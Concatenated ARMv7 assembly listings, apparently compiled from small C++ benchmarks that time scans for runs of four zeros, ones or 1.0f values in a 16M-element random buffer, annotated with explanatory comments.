.type _GLOBAL__sub_I_and.cpp,%function
_GLOBAL__sub_I_and.cpp: @ @_GLOBAL__sub_I_and.cpp
.fnstart
.Leh_func_begin3:
@ BB#0:
.save {r4, r10, r11, lr}
push {r4, r10, r11, lr}
.setfp r11, sp, #8
add r11, sp, #8
movw r4, :lower16:_ZStL8__ioinit
movt r4, :upper16:_ZStL8__ioinit
mov r0, r4
bl _ZNSt8ios_base4InitC1Ev
movw r0, :lower16:_ZNSt8ios_base4InitD1Ev
movw r2, :lower16:__dso_handle
movt r0, :upper16:_ZNSt8ios_base4InitD1Ev
movt r2, :upper16:__dso_handle
mov r1, r4
pop {r4, r10, r11, lr}
b __cxa_atexit @ tail call
.Ltmp17:
.size _GLOBAL__sub_I_and.cpp, .Ltmp17-_GLOBAL__sub_I_and.cpp
.Leh_func_end3:
.fnend
@ File-local data for and.cpp: ios_base::Init guard byte and main()'s strings.
.type _ZStL8__ioinit,%object @ @_ZStL8__ioinit
.local _ZStL8__ioinit
.comm _ZStL8__ioinit,1,1
.type .L.str,%object @ @.str
.section .rodata.str1.1,"aMS",%progbits,1
.L.str:
.asciz "time: "
.size .L.str, 7
.type .L.str1,%object @ @.str1
.L.str1:
.asciz " 1111s: "
@ NOTE(review): literal shown is 9 bytes incl. NUL, but .size says 10 and
@ main passes length 9 — a space was likely lost to whitespace collapsing in
@ this listing; verify against the original object file.
.size .L.str1, 10
.type .L.str2,%object @ @.str2
.L.str2:
.asciz "\n"
.size .L.str2, 2
@ Hook the static-init stub into .init_array.
.section .init_array,"aw",%init_array
.align 2
.long _GLOBAL__sub_I_and.cpp(target1)
.ident "Debian clang version 3.5.0-10 (tags/RELEASE_350/final) (based on LLVM 3.5.0)"
|
akalenuk/wordsandbuttons
| 14,807
|
exp/cpp_and_and/ARMv7/s/compare_zero.s
|
.text
.syntax unified
.cpu cortex-a8
.eabi_attribute 6, 10 @ Tag_CPU_arch
.eabi_attribute 7, 65 @ Tag_CPU_arch_profile
.eabi_attribute 8, 1 @ Tag_ARM_ISA_use
.eabi_attribute 9, 2 @ Tag_THUMB_ISA_use
.fpu neon
.eabi_attribute 17, 1 @ Tag_ABI_PCS_GOT_use
.eabi_attribute 20, 1 @ Tag_ABI_FP_denormal
.eabi_attribute 21, 1 @ Tag_ABI_FP_exceptions
.eabi_attribute 23, 3 @ Tag_ABI_FP_number_model
.eabi_attribute 24, 1 @ Tag_ABI_align_needed
.eabi_attribute 25, 1 @ Tag_ABI_align_preserved
.eabi_attribute 28, 1 @ Tag_ABI_VFP_args
.eabi_attribute 18, 4 @ Tag_ABI_PCS_wchar_t
.eabi_attribute 26, 2 @ Tag_ABI_enum_size
.eabi_attribute 68, 1 @ Tag_Virtualization_use
.file "compare_zero.cpp"
.globl main
.align 3
@ -----------------------------------------------------------------------------
@ int main()  —  compare_zero.cpp benchmark.
@ Same skeleton as the and.cpp variant: seed an on-stack MT19937, fill a
@ 16M-int heap buffer with uniform {0,1} draws, then time a scan counting
@ positions i where a[i]==0 && a[i+1]==0 && a[i+2]==0 && a[i+3]==0
@ (each test here is a separate cmp/bne rather than conditional-load chains),
@ and print "time: <seconds> <label> <count>\n".
@ Frame: engine at [sp,#32..] (index [sp,#2528]); dist param {0,1} at
@ [sp,#24/28]; counter [sp,#20]; two system_clock::now() results at
@ [sp,#0]/[sp,#8].  r4 = heap buffer; r8 = size (64,000,000 bytes).
@ -----------------------------------------------------------------------------
.type main,%function
main: @ @main
.fnstart
.Leh_func_begin0:
@ BB#0:
.save {r4, r5, r6, r7, r8, r10, r11, lr}
push {r4, r5, r6, r7, r8, r10, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
.pad #488
sub sp, sp, #488
.pad #2048
sub sp, sp, #2048
movw r2, #35173 @ r2 = 1812433253 (MT19937 init multiplier)
add r3, sp, #32
mov r0, #0
mov r1, #1
movt r2, #27655
str r0, [sp, #32] @ state[0] = 0 (seed)
.LBB0_1: @ =>This Inner Loop Header: Depth=1
eor r0, r0, r0, lsr #30 @ state[i] = (prev ^ (prev>>30)) * mult + i
mla r0, r0, r2, r1
str r0, [r3, r1, lsl #2]
add r1, r1, #1
cmp r1, #624
bne .LBB0_1
@ BB#2: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEC2Ej.exit
mov r0, #624
mov r5, #0
str r0, [sp, #2528] @ index = 624: force refill on first draw
mov r0, #1
str r5, [sp, #24] @ param.a = 0
str r0, [sp, #28] @ param.b = 1
.Ltmp0:
movw r8, #36864 @ r8 = 64,000,000 bytes (16M ints)
movt r8, #976
mov r0, r8
bl _Znwj @ may throw -> cleanup at .Ltmp2
mov r4, r0
.Ltmp1:
@ BB#3: @ %.lr.ph
mov r0, r4
mov r1, r8
mov r2, #0
bl __aeabi_memset @ AEABI order: (dest, n, value)
add r6, sp, #32
add r7, sp, #24
.LBB0_4: @ =>This Inner Loop Header: Depth=1
mov r0, r7
mov r1, r6
mov r2, r7
bl _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
str r0, [r4, r5]
add r5, r5, #4
cmp r5, r8
bne .LBB0_4
@ BB#5: @ %._crit_edge
add r0, sp, #8
mov r5, #0
str r5, [sp, #20] @ counter = 0
bl _ZNSt6chrono3_V212system_clock3nowEv @ t0
movw r0, #36852 @ bound = 64,000,000 - 12 (last 4-int window)
movt r0, #976
.LBB0_6: @ =>This Inner Loop Header: Depth=1
ldr r1, [r4, r5]
cmp r1, #0
bne .LBB0_10
@ BB#7: @ in Loop: Header=BB0_6 Depth=1
add r1, r4, r5
ldr r2, [r1, #4]
cmp r2, #0
bne .LBB0_10
@ BB#8: @ in Loop: Header=BB0_6 Depth=1
ldr r2, [r1, #8]
cmp r2, #0
bne .LBB0_10
@ BB#9: @ in Loop: Header=BB0_6 Depth=1
ldr r1, [r1, #12]
cmp r1, #0
ldreq r1, [sp, #20] @ all four == 0: ++counter
addeq r1, r1, #1
streq r1, [sp, #20]
.LBB0_10: @ %._crit_edge7
@ in Loop: Header=BB0_6 Depth=1
add r5, r5, #4
cmp r5, r0
bne .LBB0_6
@ BB#11:
mov r0, sp
bl _ZNSt6chrono3_V212system_clock3nowEv @ t1
.Ltmp3:
movw r0, :lower16:_ZSt4cout
movw r1, :lower16:.L.str
movt r0, :upper16:_ZSt4cout
movt r1, :upper16:.L.str
mov r2, #6
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp4:
@ BB#12:
ldr r0, [sp, #8]
ldr r1, [sp, #12]
ldm sp, {r2, r3}
subs r0, r2, r0 @ 64-bit t1 - t0
sbc r1, r3, r1
bl __aeabi_l2d
vldr d16, .LCPI0_0 @ 1e-9: ticks -> seconds
vmov d17, r0, r1
vmul.f64 d0, d17, d16
.Ltmp5:
movw r0, :lower16:_ZSt4cout
movt r0, :upper16:_ZSt4cout
bl _ZNSo9_M_insertIdEERSoT_
mov r5, r0
.Ltmp6:
@ BB#13: @ %_ZNSolsEd.exit
.Ltmp7:
movw r1, :lower16:.L.str1
mov r0, r5
movt r1, :upper16:.L.str1
mov r2, #9
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp8:
@ BB#14: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit2
ldr r1, [sp, #20]
.Ltmp9:
mov r0, r5
bl _ZNSo9_M_insertImEERSoT_ @ print the window count
.Ltmp10:
@ BB#15: @ %_ZNSolsEj.exit
.Ltmp11:
movw r1, :lower16:.L.str2
mov r2, #1
movt r1, :upper16:.L.str2
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp12:
@ BB#16: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit
cmp r4, #0
beq .LBB0_18
@ BB#17:
mov r0, r4
bl _ZdlPv @ operator delete(buffer)
.LBB0_18: @ %_ZNSt6vectorIiSaIiEED2Ev.exit
mov r0, #0
sub sp, r11, #24
pop {r4, r5, r6, r7, r8, r10, r11, pc}
@ Landing pads (cleanup only): free the buffer if allocated, resume unwinding.
.LBB0_19:
.Ltmp13:
mov r5, r0
cmp r4, #0
beq .LBB0_22
@ BB#20:
mov r0, r4
bl _ZdlPv
mov r0, r5
bl _Unwind_Resume
.LBB0_21:
.Ltmp2:
mov r5, r0
.LBB0_22: @ %_ZNSt6vectorIiSaIiEED2Ev.exit4
mov r0, r5
bl _Unwind_Resume
.align 3
@ BB#23:
.LCPI0_0:
.long 3894859413 @ double 1.0000000000000001E-9
.long 1041313291
.Ltmp14:
.size main, .Ltmp14-main
.Leh_func_end0:
.globl __gxx_personality_v0
.personality __gxx_personality_v0
@ LSDA: pure-cleanup call-site table matching the .Ltmp* ranges above.
.handlerdata
.align 2
GCC_except_table0:
.Lexception0:
.byte 255 @ @LPStart Encoding = omit
.byte 0 @ @TType Encoding = absptr
.asciz "\320" @ @TType base offset
.byte 3 @ Call site Encoding = udata4
.byte 78 @ Call site table length
.Lset0 = .Ltmp0-.Leh_func_begin0 @ >> Call Site 1 <<
.long .Lset0
.Lset1 = .Ltmp1-.Ltmp0 @ Call between .Ltmp0 and .Ltmp1
.long .Lset1
.Lset2 = .Ltmp2-.Leh_func_begin0 @ jumps to .Ltmp2
.long .Lset2
.byte 0 @ On action: cleanup
.Lset3 = .Ltmp1-.Leh_func_begin0 @ >> Call Site 2 <<
.long .Lset3
.Lset4 = .Ltmp3-.Ltmp1 @ Call between .Ltmp1 and .Ltmp3
.long .Lset4
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset5 = .Ltmp3-.Leh_func_begin0 @ >> Call Site 3 <<
.long .Lset5
.Lset6 = .Ltmp4-.Ltmp3 @ Call between .Ltmp3 and .Ltmp4
.long .Lset6
.Lset7 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset7
.byte 0 @ On action: cleanup
.Lset8 = .Ltmp4-.Leh_func_begin0 @ >> Call Site 4 <<
.long .Lset8
.Lset9 = .Ltmp5-.Ltmp4 @ Call between .Ltmp4 and .Ltmp5
.long .Lset9
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.Lset10 = .Ltmp5-.Leh_func_begin0 @ >> Call Site 5 <<
.long .Lset10
.Lset11 = .Ltmp12-.Ltmp5 @ Call between .Ltmp5 and .Ltmp12
.long .Lset11
.Lset12 = .Ltmp13-.Leh_func_begin0 @ jumps to .Ltmp13
.long .Lset12
.byte 0 @ On action: cleanup
.Lset13 = .Ltmp12-.Leh_func_begin0 @ >> Call Site 6 <<
.long .Lset13
.Lset14 = .Leh_func_end0-.Ltmp12 @ Call between .Ltmp12 and .Leh_func_end0
.long .Lset14
.long 0 @ has no landing pad
.byte 0 @ On action: cleanup
.align 2
.fnend
.section .text._ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,"axG",%progbits,_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,comdat
.weak _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.align 2
@ -----------------------------------------------------------------------------
@ int std::uniform_int_distribution<int>::operator()(mt19937&, const param_type&)
@ (COMDAT copy; identical to the other instantiation.)
@ r0 = this (unused), r1 = engine -> r5, r2 = param {a,b} -> r9.
@ range = b-a; if range == 0xFFFFFFFF, return one tempered draw; otherwise
@ rejection-sample: scale = 0xFFFFFFFF/(range+1), limit = scale*(range+1),
@ redraw while x >= limit, result = a + x/scale.  Tempering: x^=x>>11;
@ x^=(x<<7)&0x9D2C5680; x^=(x<<15)&0xEFC60000; x^=x>>18.
@ Engine index at [engine,#2496]; _M_gen_rand refills at 624.
@ -----------------------------------------------------------------------------
.type _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE,%function
_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE: @ @_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.fnstart
.Leh_func_begin1:
@ BB#0:
.save {r4, r5, r6, r7, r8, r9, r11, lr}
push {r4, r5, r6, r7, r8, r9, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
mov r9, r2
mov r5, r1
ldm r9, {r0, r1} @ r0 = a, r1 = b
sub r0, r1, r0
cmn r0, #1 @ full 32-bit range?
beq .LBB1_6
@ BB#1:
add r7, r0, #1
mvn r0, #0
mov r1, r7
bl __aeabi_uidiv @ scale = 0xFFFFFFFF / (range+1)
mov r8, r0
ldr r1, [r5, #2496]
mul r7, r8, r7 @ limit = scale * (range+1)
movw r6, #22144 @ r6 = 0x9D2C5680
movw r4, #0
movt r6, #40236
movt r4, #61382 @ r4 = 0xEFC60000
.LBB1_2: @ =>This Inner Loop Header: Depth=1
cmp r1, #624
blo .LBB1_4
@ BB#3: @ in Loop: Header=BB1_2 Depth=1
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r1, [r5, #2496]
.LBB1_4: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit2
@ in Loop: Header=BB1_2 Depth=1
add r2, r1, #1
str r2, [r5, #2496] @ consume one state word
ldr r0, [r5, r1, lsl #2]
eor r0, r0, r0, lsr #11
and r1, r6, r0, lsl #7
eor r0, r1, r0
and r1, r4, r0, lsl #15
eor r0, r1, r0
mov r1, r2
eor r0, r0, r0, lsr #18
cmp r0, r7
bhs .LBB1_2 @ reject and redraw
@ BB#5:
mov r1, r8
bl __aeabi_uidiv @ x / scale
b .LBB1_9
.LBB1_6: @ full-range case: single tempered draw
ldr r0, [r5, #2496]
cmp r0, #624
blo .LBB1_8
@ BB#7:
mov r0, r5
bl _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
ldr r0, [r5, #2496]
.LBB1_8: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEclEv.exit
add r1, r0, #1
str r1, [r5, #2496]
ldr r0, [r5, r0, lsl #2]
movw r1, #22144
movt r1, #40236
eor r0, r0, r0, lsr #11
and r1, r1, r0, lsl #7
eor r0, r1, r0
movw r1, #0
movt r1, #61382
and r1, r1, r0, lsl #15
eor r0, r1, r0
eor r0, r0, r0, lsr #18
.LBB1_9:
ldr r1, [r9]
add r0, r1, r0 @ result = a + scaled draw
pop {r4, r5, r6, r7, r8, r9, r11, pc}
.Ltmp15:
.size _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE, .Ltmp15-_ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
.cantunwind
.fnend
.section .text._ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,"axG",%progbits,_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,comdat
.weak _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.align 2
@ -----------------------------------------------------------------------------
@ MT19937 _M_gen_rand() (COMDAT copy; identical to the other instantiations).
@ r0 = engine; rewrites all 624 state words with the twist
@     y = (s[i]&0x80000000)|(s[i+1]&0x7FFFFFFF);
@     s[i] = s[(i+397)%624] ^ (y>>1) ^ (y&1 ? 0x9908B0DF : 0)
@ then zeroes the index at [r0,#2496].
@ -----------------------------------------------------------------------------
.type _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv,%function
_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv: @ @_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.fnstart
.Leh_func_begin2:
@ BB#0:
.save {r4, r5, r11, lr}
push {r4, r5, r11, lr}
ldr lr, [r0] @ lr = s[0]
movw r12, #45279 @ r12 = 0x9908B0DF (twist constant)
mov r2, #0
movt r12, #39176
.LBB2_1: @ =>This Inner Loop Header: Depth=1
add r1, r0, r2
ldr r3, [r1, #4] @ s[i+1]
ldr r5, [r1, #1588] @ s[i+397]
and r1, lr, #-2147483648
bic r4, r3, #-2147483647
tst r3, #1
orr r1, r4, r1
mov lr, r3
eor r1, r5, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, r2]
add r2, r2, #4
cmp r2, #908
bne .LBB2_1
@ BB#2: @ %.preheader
ldr r4, [r0, #908]
mov r2, #0
.LBB2_3: @ =>This Inner Loop Header: Depth=1
rsb r1, r2, #0
mov r5, r0
and r4, r4, #-2147483648
sub r2, r2, #1
ldr lr, [r5, r1, lsl #2]! @ wrapped partner s[i+397-624]
ldr r3, [r5, #912]
bic r1, r3, #-2147483647
tst r3, #1
orr r1, r1, r4
mov r4, r3
eor r1, lr, r1, lsr #1
eorne r1, r1, r12
str r1, [r5, #908]
cmn r2, #396
bne .LBB2_3
@ BB#4:
ldr r1, [r0, #2492] @ last word
ldr r2, [r0]
and r1, r1, #-2147483648
ldr r3, [r0, #1584]
bic r5, r2, #-2147483647
tst r2, #1
orr r1, r5, r1
mov r2, #0
eor r1, r3, r1, lsr #1
eorne r1, r1, r12
str r1, [r0, #2492]
str r2, [r0, #2496] @ reset index
pop {r4, r5, r11, pc}
.Ltmp16:
.size _ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv, .Ltmp16-_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EE11_M_gen_randEv
.cantunwind
.fnend
.section .text.startup,"ax",%progbits
.align 2
@ Static-initialization stub: constructs the file-local std::ios_base::Init
@ guard and registers its destructor via __cxa_atexit(dtor, &_ZStL8__ioinit,
@ &__dso_handle); lr restored first, so the final branch is a tail call.
.type _GLOBAL__sub_I_compare_zero.cpp,%function
_GLOBAL__sub_I_compare_zero.cpp: @ @_GLOBAL__sub_I_compare_zero.cpp
.fnstart
.Leh_func_begin3:
@ BB#0:
.save {r4, r10, r11, lr}
push {r4, r10, r11, lr}
.setfp r11, sp, #8
add r11, sp, #8
movw r4, :lower16:_ZStL8__ioinit
movt r4, :upper16:_ZStL8__ioinit
mov r0, r4
bl _ZNSt8ios_base4InitC1Ev
movw r0, :lower16:_ZNSt8ios_base4InitD1Ev
movw r2, :lower16:__dso_handle
movt r0, :upper16:_ZNSt8ios_base4InitD1Ev
movt r2, :upper16:__dso_handle
mov r1, r4
pop {r4, r10, r11, lr}
b __cxa_atexit @ tail call
.Ltmp17:
.size _GLOBAL__sub_I_compare_zero.cpp, .Ltmp17-_GLOBAL__sub_I_compare_zero.cpp
.Leh_func_end3:
.fnend
@ File-local data for compare_zero.cpp: ios_base::Init guard byte and the
@ strings main() prints.
.type _ZStL8__ioinit,%object @ @_ZStL8__ioinit
.local _ZStL8__ioinit
.comm _ZStL8__ioinit,1,1
.type .L.str,%object @ @.str
.section .rodata.str1.1,"aMS",%progbits,1
.L.str:
.asciz "time: "
.size .L.str, 7
.type .L.str1,%object @ @.str1
.L.str1:
.asciz " 0000s: "
@ NOTE(review): literal shown is 9 bytes incl. NUL, but .size says 10 and
@ main passes length 9 — a space was likely lost to whitespace collapsing in
@ this listing; verify against the original object file.
.size .L.str1, 10
.type .L.str2,%object @ @.str2
.L.str2:
.asciz "\n"
.size .L.str2, 2
@ Hook the static-init stub into .init_array.
.section .init_array,"aw",%init_array
.align 2
.long _GLOBAL__sub_I_compare_zero.cpp(target1)
.ident "Debian clang version 3.5.0-10 (tags/RELEASE_350/final) (based on LLVM 3.5.0)"
|
akalenuk/wordsandbuttons
| 14,998
|
exp/cpp_and_and/ARMv7/s/andand_float.s
|
.text
.syntax unified
.cpu cortex-a8
.eabi_attribute 6, 10 @ Tag_CPU_arch
.eabi_attribute 7, 65 @ Tag_CPU_arch_profile
.eabi_attribute 8, 1 @ Tag_ARM_ISA_use
.eabi_attribute 9, 2 @ Tag_THUMB_ISA_use
.fpu neon
.eabi_attribute 17, 1 @ Tag_ABI_PCS_GOT_use
.eabi_attribute 20, 1 @ Tag_ABI_FP_denormal
.eabi_attribute 21, 1 @ Tag_ABI_FP_exceptions
.eabi_attribute 23, 3 @ Tag_ABI_FP_number_model
.eabi_attribute 24, 1 @ Tag_ABI_align_needed
.eabi_attribute 25, 1 @ Tag_ABI_align_preserved
.eabi_attribute 28, 1 @ Tag_ABI_VFP_args
.eabi_attribute 18, 4 @ Tag_ABI_PCS_wchar_t
.eabi_attribute 26, 2 @ Tag_ABI_enum_size
.eabi_attribute 68, 1 @ Tag_Virtualization_use
.file "andand_float.cpp"
.globl main
.align 3
@ -----------------------------------------------------------------------------
@ int main()  —  andand_float.cpp benchmark.
@ Same skeleton as the integer variants, but the 16M-element buffer holds
@ float: each uniform {0,1} draw is converted with vcvt.f32.s32 before being
@ stored, and the timed scan counts positions i where a[i], a[i+1], a[i+2],
@ a[i+3] all compare equal to 1.0f (vcmpe.f32 against s0 = 1.0).  Prints
@ "time: <seconds> <label> <count>\n".
@ Frame: engine at [sp,#32..] (index [sp,#2528]); dist param {0,1} at
@ [sp,#24/28]; counter [sp,#20]; system_clock::now() results at [sp,#0]/[sp,#8].
@ r4 = heap buffer; r8 = size, 64,000,000 bytes (16M floats).
@ -----------------------------------------------------------------------------
.type main,%function
main: @ @main
.fnstart
.Leh_func_begin0:
@ BB#0:
.save {r4, r5, r6, r7, r8, r10, r11, lr}
push {r4, r5, r6, r7, r8, r10, r11, lr}
.setfp r11, sp, #24
add r11, sp, #24
.pad #488
sub sp, sp, #488
.pad #2048
sub sp, sp, #2048
movw r2, #35173 @ r2 = 1812433253 (MT19937 init multiplier)
add r3, sp, #32
mov r0, #0
mov r1, #1
movt r2, #27655
str r0, [sp, #32] @ state[0] = 0 (seed)
.LBB0_1: @ =>This Inner Loop Header: Depth=1
eor r0, r0, r0, lsr #30 @ state[i] = (prev ^ (prev>>30)) * mult + i
mla r0, r0, r2, r1
str r0, [r3, r1, lsl #2]
add r1, r1, #1
cmp r1, #624
bne .LBB0_1
@ BB#2: @ %_ZNSt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEC2Ej.exit
mov r0, #624
mov r5, #0
str r0, [sp, #2528] @ index = 624: force refill on first draw
mov r0, #1
str r5, [sp, #24] @ param.a = 0
str r0, [sp, #28] @ param.b = 1
.Ltmp0:
movw r8, #36864 @ r8 = 64,000,000 bytes (16M floats)
movt r8, #976
mov r0, r8
bl _Znwj @ may throw -> cleanup at .Ltmp2
mov r4, r0
.Ltmp1:
@ BB#3: @ %.lr.ph
mov r0, r4
mov r1, r8
mov r2, #0
bl __aeabi_memset @ AEABI order: (dest, n, value)
add r6, sp, #32
add r7, sp, #24
.LBB0_4: @ =>This Inner Loop Header: Depth=1
mov r0, r7
mov r1, r6
mov r2, r7
bl _ZNSt24uniform_int_distributionIiEclISt23mersenne_twister_engineIjLj32ELj624ELj397ELj31ELj2567483615ELj11ELj4294967295ELj7ELj2636928640ELj15ELj4022730752ELj18ELj1812433253EEEEiRT_RKNS0_10param_typeE
vmov s0, r0 @ int draw -> float
add r0, r4, r5
add r5, r5, #4
vcvt.f32.s32 s0, s0
cmp r5, r8
vstr s0, [r0]
bne .LBB0_4
@ BB#5: @ %._crit_edge
add r0, sp, #8
mov r5, #0
str r5, [sp, #20] @ counter = 0
bl _ZNSt6chrono3_V212system_clock3nowEv @ t0
vmov.f32 s0, #1.000000e+00 @ comparison constant 1.0f
movw r0, #36852 @ bound = 64,000,000 - 12 (last 4-float window)
movt r0, #976
.LBB0_6: @ =>This Inner Loop Header: Depth=1
add r1, r4, r5
vldr s2, [r1]
vcmpe.f32 s2, s0
vmrs APSR_nzcv, fpscr @ copy FP compare result into the ARM flags
bne .LBB0_10
@ BB#7: @ in Loop: Header=BB0_6 Depth=1
vldr s2, [r1, #4]
vcmpe.f32 s2, s0
vmrs APSR_nzcv, fpscr
bne .LBB0_10
@ BB#8: @ in Loop: Header=BB0_6 Depth=1
vldr s2, [r1, #8]
vcmpe.f32 s2, s0
vmrs APSR_nzcv, fpscr
bne .LBB0_10
@ BB#9: @ in Loop: Header=BB0_6 Depth=1
vldr s2, [r1, #12]
vcmpe.f32 s2, s0
vmrs APSR_nzcv, fpscr
ldreq r1, [sp, #20] @ all four == 1.0f: ++counter
addeq r1, r1, #1
streq r1, [sp, #20]
.LBB0_10: @ %._crit_edge7
@ in Loop: Header=BB0_6 Depth=1
add r5, r5, #4
cmp r5, r0
bne .LBB0_6
@ BB#11:
mov r0, sp
bl _ZNSt6chrono3_V212system_clock3nowEv @ t1
.Ltmp3:
movw r0, :lower16:_ZSt4cout
movw r1, :lower16:.L.str
movt r0, :upper16:_ZSt4cout
movt r1, :upper16:.L.str
mov r2, #6
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp4:
@ BB#12:
ldr r0, [sp, #8]
ldr r1, [sp, #12]
ldm sp, {r2, r3}
subs r0, r2, r0 @ 64-bit t1 - t0
sbc r1, r3, r1
bl __aeabi_l2d
vldr d16, .LCPI0_0 @ 1e-9: ticks -> seconds
vmov d17, r0, r1
vmul.f64 d0, d17, d16
.Ltmp5:
movw r0, :lower16:_ZSt4cout
movt r0, :upper16:_ZSt4cout
bl _ZNSo9_M_insertIdEERSoT_
mov r5, r0
.Ltmp6:
@ BB#13: @ %_ZNSolsEd.exit
.Ltmp7:
movw r1, :lower16:.L.str1
mov r0, r5
movt r1, :upper16:.L.str1
mov r2, #9
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp8:
@ BB#14: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit2
ldr r1, [sp, #20]
.Ltmp9:
mov r0, r5
bl _ZNSo9_M_insertImEERSoT_ @ print the window count
.Ltmp10:
@ BB#15: @ %_ZNSolsEj.exit
.Ltmp11:
movw r1, :lower16:.L.str2
mov r2, #1
movt r1, :upper16:.L.str2
bl _ZSt16__ostream_insertIcSt11char_traitsIcEERSt13basic_ostreamIT_T0_ES6_PKS3_i
.Ltmp12:
@ BB#16: @ %_ZStlsISt11char_traitsIcEERSt13basic_ostreamIcT_ES5_PKc.exit
cmp r4, #0
beq .LBB0_18
@ BB#17:
mov r0, r4
bl _ZdlPv @ operator delete(buffer)
.LBB0_18: @ %_ZNSt6vectorIfSaIfEED2Ev.exit
mov r0, #0
sub sp, r11, #24
pop {r4, r5, r6, r7, r8, r10, r11, pc}
@ Landing pads (cleanup only): free the buffer if allocated, resume unwinding.
.LBB0_19:
.Ltmp13:
mov r5, r0
cmp r4, #0
beq .LBB0_22
@ BB#20:
mov r0, r4
bl _ZdlPv
mov r0, r5
bl _Unwind_Resume
.LBB0_21:
